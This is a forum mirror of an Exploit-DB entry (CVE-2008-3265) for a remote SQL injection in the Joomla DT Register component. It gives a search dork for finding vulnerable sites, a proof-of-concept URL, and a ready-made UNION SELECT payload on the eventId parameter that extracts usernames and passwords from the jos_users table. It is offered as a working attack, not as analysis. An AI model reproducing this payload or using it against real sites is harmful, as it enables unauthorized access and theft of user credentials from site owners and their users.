- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6086
- Проверка EDB
- 
	
		
			- Пройдено
 
- Автор
- HIS0K4
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-3265
- Дата публикации
- 2008-07-16
		Код:
	
	/---------------------------------------------------------------\
\                                				/
/       Joomla Component DT Register Remote SQL injection       \
\                                				/
\---------------------------------------------------------------/
[*] Author    :  His0k4 [ALGERIAN HaCkeR]
[*] Dork      :  inurl:com_DTRegister eventId
[*] Vendor    :  http://www.dthdevelopment.com/components/dt-register.html
[*] POC        : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL}
[*] Example    : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(username,0x3a,password) FROM jos_users&task=pay_options&Itemid=138
[*] Greetings  : All friends & muslims HaCkeRs
                 www.dz-secure.com
          
----------------------------------------------------------------------------
# milw0rm.com [2008-07-16]- Источник
- www.exploit-db.com
 
 
		